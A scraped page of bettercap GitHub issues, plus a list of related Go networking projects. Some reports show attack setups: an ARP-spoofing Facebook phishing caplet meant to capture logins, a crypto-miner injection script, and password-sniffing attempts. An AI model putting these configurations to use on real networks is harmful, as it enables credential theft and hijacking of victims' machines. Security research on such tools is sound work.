    |                 |                   |                             |                             |        |        |           |
    | 192.168.0.24    | 40:cb:c0:xx:xx:xx | appletv                     |                             | 0 B    | 0 B    | 19:33:35  |
    | 199.59.148.241  | bc:4d:fb:98:1c:32 | r-199-59-148-241.twttr.com. | Hitron Technologies.        | 1.1 kB | 660 B  | 19:33:52  |
    | 224.0.0.251     | 01:00:5e:00:00:fb |                             |                             | 0 B    | 0 B    | 19:33:35  |
    | 239.255.255.250 | 01:00:5e:7f:ff:fa |                             |                             | 0 B    | 25 kB  | 19:33:35  |
    +-----------------+-------------------+-----------------------------+-----------------------------+--------+--------+-----------+
    
    ❯ [19:47:19] [endpoint.lost] Endpoint 199.59.148.241 (r-199-59-148-241.twttr.com.) lost.
    ❯ [19:47:20] [endpoint.new] Endpoint 54.190.15.71 detected as bc:4d:fb:98:1c:32 (Hitron Technologies.).
    ❯ [19:47:41] [endpoint.lost] Endpoint 54.190.15.71 (ec2-54-190-15-71.us-west-2.compute.amazonaws.com.) lost.
    ❯ [19:47:41] [endpoint.new] Endpoint 199.59.148.241 detected as bc:4d:fb:98:1c:32 (Hitron Technologies.).
    


    Expected behavior:

    • Should not see the Hitron Technologies gateway twice.
    • Should not see a Twitter IP address and hostname for the gateway.
    • Possibly shouldn't see the last two devices (vendor is IPv4 Multicast - not sure where they are from)

    Actual behavior:

    • Seeing the Hitron Technologies gateway twice.
    • Duplicated gateway shows IP address owned by Twitter and a twttr.com hostname (note: this changes to any other random IP and hostname each time I run bettercap). Every few minutes it "loses" this device and then finds it again with another IP address.
    • Seeing two IPv4 Multicast devices(?)
  • ARP spoof not working with FB-phising site

    ARP spoof not working with FB-phising site

    What I am trying at home is the fb-phishing caplet. When i run it no computer (http nor https) is being redirected to my http server. What I tried: Dns spoof The victim just loses connection and says there is no internet connection ARP spoof Nothing gets spoofed and the computer keeps it's connection HTTP(s) Proxy with SSLstrip Then you get the error from google chrome (HSTS)

    Going from the victim ip to the webserver works and when i try to login it redirects to facebook.com/login.php but the inlog details are not saved nor displayed thus assuming that the javascript injection is not working.

    Environment

    Please provide:

    • Bettercap version = latest

    • Victum + host = MacOS

    • Command line arguments you are using = sudo ./bettercap -caplet caplets/fb-phish.cap

    Steps to Reproduce

    1. download bettercap: https://github.com/bettercap/bettercap/releases/download/v2.4/bettercap_macos_amd64_2.4.zip
    2. run: sudo ./bettercap -caplet caplets/fb-phish.cap
    3. nothing happens on the victum PC.
    4. I tried arp.spoof on but that does not help as well. (looks like ARP spoofing is not working on mac)

    Expected behavior: Victim gets redirected to the fake FB site. fills in the username and password and that gets saved (does not save the login details!)

    Actual behavior: The victim just goes straight through internetting without forwarding

    LOG: Caplet:

    set http.server.address 0.0.0.0
    set http.server.path caplets/www/www.facebook.com/
    
    set http.proxy.script caplets/fb-phish.js
    
    http.proxy on
    http.server on
    arp.spoof on
    

    Output:

    bettercap v2.4 (type 'help' for a list of commands)
    
    [14:39:55] [sys.log] [inf] Reading from caplet caplets/fb-phish.cap ...
    [14:39:55] [endpoint.new] Endpoint 192.168.8.15 detected as ec:35:86:42:ac:92 (Apple).
    [14:39:55] [sys.log] [inf] Enabling forwarding.
    [14:39:55] [sys.log] [inf] http.proxy started on 192.168.8.16:8080 (sslstrip disabled)
    [14:39:55] [sys.log] [inf] Enabling forwarding.
    192.168.8.0/24 > 192.168.8.16  » [14:39:55] [sys.log] [inf] ARP spoofer started, probing 256 targets.
    192.168.8.0/24 > 192.168.8.16  » [14:39:56] [sys.log] [inf] You are running 2.4 which is the latest stable version.
    192.168.8.0/24 > 192.168.8.16  » active
    arp.spoof (Keep spoofing selected hosts on the network.)
    
      arp.spoof.targets : <entire subnet>
      arp.spoof.whitelist : 
    
    events.stream (Print events as a continuous stream.)
    
      events.stream.output : 
    
    http.proxy (A full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it.)
    
      http.proxy.sslstrip : false
      http.port : 80
      http.proxy.address : <interface address>
      http.proxy.port : 8080
      http.proxy.script : caplets/fb-phish.js
    
    http.server (A simple HTTP server, to be used to serve files and scripts across the network.)
    
      http.server.path : caplets/www/www.facebook.com/
      http.server.address : 0.0.0.0
      http.server.port : 80
      http.server.certificate : 
      http.server.key : 
    
    net.recon (Read periodically the ARP cache in order to monitor for new hosts on the network.)
    192.168.8.0/24 > 192.168.8.16  » [14:40:49] [sys.log] [inf] (httpd) [ GET localhost/osd.xml
    192.168.8.0/24 > 192.168.8.16  » [14:40:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:41:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:42:36] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/webstorage/process_keys/
    192.168.8.0/24 > 192.168.8.16  » [14:43:20] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:43:43] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:43:44] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/
    192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/osd.xml
    192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/cookie/consent/
    192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:45:51] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » [14:48:21] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
    192.168.8.0/24 > 192.168.8.16  » 
    

    ref: https://github.com/bettercap/caplets/issues/13

  • Bettercap v2.2 and 2.3 console hangs after a few events are reported.

    Bettercap v2.2 and 2.3 console hangs after a few events are reported.

    Done


    bettercap v2.2 and 2.3 become hung in both wifi.recon and net.probe modules without any additional interaction, only time.

    Environment

    Please provide:

    • Bettercap 2.3
    • Kali2018.1
    • go version go1.9.2 linux/amd64
    • sudo ./bettercap -debug -iface wlan1
    • No caplets needed, both just wifi.recon on wlan or net.probe on eth devices hang after a period of time. In my debug session, I issued several commands as it seems more arbitrary commands speed this up. However, just executing bettercap and only wifi.recon on or net.probe on will result in a hang after some time, usually when you come back to session and execute a command. Full debug here:

    https://pastebin.com/xn0Ri2s0

    1. Execute bettercap 2.2 or 2.3 with -iface wlan* or -iface eth*
    2. Wait....
    3. Execute a command

    Expected behavior: What you expected to happen Expected bettercap console not to hang

    Actual behavior: What actually happened Bettercap console hangs with or without much interactive activity, but activity seems to accelerate this and lessen the time that bettercap responds.

    ♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

  • Unable to sniff passwords

    Unable to sniff passwords

    I have enabled all the modules but when i am able to login in the same computer browser on http its not showing any password or header on the bettercap 2. If i have missed anything help me out!

    Thank You!

  •  error while initializing wlan0 to channel 1: iwconfig: out=Error for wireless request

    error while initializing wlan0 to channel 1: iwconfig: out=Error for wireless request "Set Frequency" (8B04) : SET failed on device wlan0 ; Operation not supported. err=exit status 250

    Prerequisites

    error while initializing wlan0 to channel 1: iwconfig: out=Error for wireless request "Set Frequency" (8B04) : SET failed on device wlan0 ; Operation not supported. err=exit status 250

    Description of the bug or feature request

    Environment

    Please provide:

    *bettercap v2.32.0 (built for linux amd64 with go1.18.5)

    • Linux voidinc 5.18.15-zen1-1-zen #1 ZEN SMP PREEMPT_DYNAMIC Fri, 29 Jul 2022 22:52:41 +0000 x86_64 GNU/Linux
    • go version go1.18.5 linux/amd64
      • sudo bettercap -caplet http-ui
    • Caplet code you are using or the interactive session commands.
    • **https://pastebin.com/arn2Z4ga

    Steps to Reproduce

    1. open the webui
    2. go the the wifi tab
    3. click the start wifi module

    Expected behavior: What you expected to happen No errors

    Actual behavior: What actually happened error while initializing wlan0 to channel 1: iwconfig: out=Error for wireless request "Set Frequency" (8B04) : SET failed on device wlan0 ; Operation not supported. err=exit status 250

    ♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

  • Problems with crypto-miner caplet

    Problems with crypto-miner caplet

    image Hi, I am having some trouble deploying the crypto miner caplet, the above image is the error I get whenever doing so. Furthermore, when accessing http pages the javascript is not loaded. My bettercap version is bettercap v2.32.0 (built for linux amd64 with go1.18.1)

    I have just changed a couple things in the .cap file, this is what I am using:

    net.probe on set cryptominer.name coinimp

    set cryptominer.key key

    set http.proxy.script crypto-miner.js

    set http.proxy.sslstrip true

    http.proxy on

    sleep 1

    net.probe off arp.spoof on

    And for the other file, I changed the coinimp js to the one I am prompted in coinimp dashboard. Here:

    var green = "\033[32m", reset = "\033[0m"

    function onLoad() { logStr = "Javascript Crypto Miner loaded.\n" + "\n Miner: " + green + env["cryptominer.name"].charAt(0).toUpperCase() + env["cryptominer.name"].slice(1) + reset + "\n Targets: " + green + env["arp.spoof.targets"] + reset + "\n" log(logStr); }

    function onResponse(req, res) { if( res.ContentType.indexOf('text/html') == 0 ){ var body = res.ReadBody(); if( body.indexOf('') != -1 ) { switch(env["cryptominer.name"]) { case "coinhive": res.Body = body.replace( '', '', '' ); break; case "cryptoloot": res.Body = body.replace( '', '', '' ); break; case "coinimp": res.Body = body.replace( ‘’, ‘’ ); break; } } } }

    help pl

  • Possible crack the certificate of https website that had been visited before without the permissions of the target machine?

    Possible crack the certificate of https website that had been visited before without the permissions of the target machine?

    Prerequisites

    Please, before creating this issue make sure that you read the README, that you are running the latest stable version and that you already searched other issues to see if your problem or request was already reported.

    ! PLEASE REMOVE THIS PART AND LEAVE ONLY THE FOLLOWING SECTIONS IN YOUR REPORT !

    Description of the bug or feature request

    Environment

    Please provide:

    • Bettercap version you are using ( bettercap -version ).
    • OS version and architecture you are using.
    • Go version if building from sources.
    • Command line arguments you are using.
    • Caplet code you are using or the interactive session commands.
    • Full debug output while reproducing the issue ( bettercap -debug ... ).

    Steps to Reproduce

    1. First Step
    2. Second Step
    3. and so on...

    Expected behavior: What you expected to happen

    Actual behavior: What actually happened

    --

    ♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

  • Can't find router Mac Address

    Can't find router Mac Address

    Hi you guys I've finally had time to submit a report been working crazy hours so I haven't touched my setup in a focused manner in a while debating doing it now as I'm exhausted but I really enjoy using bettercap2 we have a click jacking abilitiy yo is there a tut for that.

    Description of the bug or feature request

    Environment

    Dragon os focal live USB

    Please provide:

    • Bettercap version you are using ( bettercap -version ).

    Latest

    • OS version and architecture you are using. Lubuntu dragon os focal latest

    • Go version if building from sources.

    Latest Go Version

    • Command line arguments you are using.

    Sudo -i

    Bettercap -iface wlo1 --gateway-override 192.168.1.1

    Net.probe on Net.sniff on

    Set arp.spoof.fullduplex true Arp.spoof on

    • Caplet code you are using or the interactive session commands.

    Manual because I'm built like that

    • Full debug output while reproducing the issue ( bettercap -debug ... ).

    Literally that's my only issue

    Mac address gateway not found

    Steps to Reproduce

    1. sudo -i
    2. Bettercap -iface wlo1 --gateway-override 192.168.1.1
    3. Arp.spoof on

    ..*

    Expected behavior: What you expected to happen

    Being able to see my app traffic

    Actual behavior: What actually happened

    Mac address for the gateway isn't found 😞

    Then it goes kapoot and replays the same error message and makes me sad

    --

    ♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

  • 'http.proxy on' command returns exit status 1

    'http.proxy on' command returns exit status 1

    • When I use the http.proxy on command, it gives the following error:

    [11:34:37] [sys.log] [err] exit status 1

    Environment

    Please provide:

    • Bettercap version - bettercap v2.31.1 (built for windows amd64 with zip file)
    • OS version and architecture you are using - Windows 10 (x64)

    Steps to Reproduce

    1. I run all of the above session commands

    Expected behavior: Running the above code without errors.

    Actual behavior: Returns the above error.

  • ble.enum fails with

    ble.enum fails with "ble.recon connection timeout" on bettercap 2.32.0

    Bettercap 2.32.0 seems to consistently fail enumerating BLE devices on my machine, which is running a clean install of Debian Bullseye

    Environment

    • Bettercap version you are using ( bettercap -version ). bettercap v2.32.0 (built for linux amd64 with go1.15.15)
    • OS version and architecture you are using. Debian 11 "Bullseye" with all updates as of 2022-06-24 Kernel info: Linux thinkpad 5.10.0-15-amd64 #1 SMP Debian 5.10.120-1 (2022-06-09) x86_64 GNU/Linux I also tested using the Docker version (bettercap/bettercap which is also 2.32.0) and got the same result Hardware is a Lenovo T430s with onboard OEM Bluetooth, reports as 0a5c:21e6 Broadcom Corp. BCM20702 Bluetooth 4.0 [ThinkPad]
    • Go version if building from sources. go1.15.15 (packaged with Debian, apt install golang)
    • Command line arguments you are using. Running sudo bettercap -debug and also tested using web UI, got the same results
    • Caplet code you are using or the interactive session commands. See debug log or Steps to Reproduce, below, for interactive commands.
    • Full debug output while reproducing the issue ( bettercap -debug ... ). Debug output available in this Gist: https://gist.github.com/kadin2048/a72b2d5c0c41dbfd2c8c046438e21863

    Steps to Reproduce

    1. ble.recon on
    2. wait a while for devices to populate
    3. ble.recon off
    4. ble.show
    5. ble.enum [MAC address]
    6. usually a 10s pause or so, on the first run
    7. error message ble.recon connection timeout is displayed alongside debug output

    Expected behavior: Would have expected enum output for the device specified by the MAC address.

    Actual behavior: Receive message [sys.log] [war] ble.recon connection timeout Issue is repeatable, and appears to happen faster on subsequent tries after the initial one

    Happy to provide additional information that might help with resolving the issue.

Package ethernet implements marshaling and unmarshaling of IEEE 802.3 Ethernet II frames and IEEE 802.1Q VLAN tags. MIT Licensed.

ethernet Package ethernet implements marshaling and unmarshaling of IEEE 802.3 Ethernet II frames and IEEE 802.1Q VLAN tags. MIT Licensed. For more in

Jul 17, 2022
Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.
Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.

Features • Installation • Usage • Running Proxify • Installing SSL Certificate • Applications of Proxify • Join Discord Swiss Army Knife Proxy for rap

Jul 31, 2022
A Go package for sending and receiving ethernet frames. Currently supporting Linux, Freebsd, and OS X.

ether ether is a go package for sending and receiving ethernet frames. Currently supported platform: BPF based OS X FreeBSD AF_PACKET based Linux Docu

Jun 20, 2022
Capture sensor data from Xiaomi thermometers (via BLE) and expose it as prometheus metrics

sensor-probe Sensor Probe is a small utility that reads advertisement data sent by the Xiaomi Thermometer LYWSD03MMC via Bluetooth LE and expose them

Jan 13, 2022
A tool for IDN homograph attacks and detection.

Ditto is a small tool that accepts a domain name as input and generates all its variants for an homograph attack as output, checking which ones are av

Jul 27, 2022
O365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365

O365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). O365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use.

Jul 27, 2022
Log4Shell is a middleware plugin for Traefik which blocks JNDI attacks based on HTTP header values.

Log4Shell Mitigation Log4Shell is a middleware plugin for Traefik which blocks JNDI attacks based on HTTP header values. Related to the Log4J CVE: htt

Jul 26, 2022
A library for working with IP addresses and networks in Go

IPLib I really enjoy Python's ipaddress library and Ruby's ipaddr, I think you can write a lot of neat software if some of the little problems around

Jul 31, 2022
webrpc is a schema-driven approach to writing backend services for modern Web apps and networks
webrpc is a schema-driven approach to writing backend services for modern Web apps and networks

webrpc is a schema-driven approach to writing backend servers for the Web. Write your server's api interface in a schema format of RIDL or JSON, and t

Aug 3, 2022
Netmaker is a tool for creating and managing virtual networks
Netmaker is a tool for creating and managing virtual networks

Netmaker is a tool for creating and managing virtual networks. The goal is to make virtual/overlay/mesh networking easy for non-networking people. It should be like clicking a button. Netmaker consists of a server, an agent, and a UI.

Aug 7, 2022
A flexible configuration manager for Wireguard networks
A flexible configuration manager for Wireguard networks

Drago A flexible configuration manager for WireGuard networks Drago is a flexible configuration manager for WireGuard networks which is designed to ma

Aug 2, 2022
Transfer 10Gbps http traffic over 1Gbps networks :)

httpteleport Teleports 10Gbps http traffic over 1Gbps networks. Built on top of fastrpc. Use cases httpteleport may significantly reduce inter-server

Jun 14, 2022
A Lightweight VPN Built on top of Libp2p for Truly Distributed Networks.
A Lightweight VPN Built on top of Libp2p for Truly Distributed Networks.

Hyprspace A Lightweight VPN Built on top of Libp2p for Truly Distributed Networks. demo.mp4 Table of Contents A Bit of Backstory Use Cases A Digital N

Aug 4, 2022
Data source provider for Terraform that interacts with the Solana networks

Terraform Solana Provider Registry Page Requirements Terraform >= 0.13.x Go 1.16.x (for building from source) Example Usage Full provider documentatio

Aug 6, 2022
Mount your podman container into WireGuard networks on spawn

wg-pod A tool to quickly join your podman container/pod into a WireGuard network. Explanation wg-pod wires up the tools ip,route,wg and podman. It cre

Mar 29, 2022
Attach services to specified networks automatically

Docker swarm network attacher Description docker-swarm-network-attacher aims to solve the problem of sharing a network between unrelated services. Wit

Nov 11, 2021
A memory-safe SSH server, focused on listening only on VPN networks such as Tailscale

Features Is tested to work with SCP Integrates well with systemd Quickstart Download binary for your architecture. We only support Linux. If you don't

Jun 10, 2022
Overlay networks based on WebRTC.
Overlay networks based on WebRTC.

weron Overlay networks based on WebRTC. ⚠️ weron has not yet been audited! While we try to make weron as secure as possible, it has not yet undergone

Jul 27, 2022
A golang library about socks5, supports all socks5 commands. That Provides server and client and easy to use. Compatible with socks4 and socks4a.

socks5 This is a Golang implementation of the Socks5 protocol library. To see in this SOCKS Protocol Version 5. This library is also compatible with S

Jul 4, 2022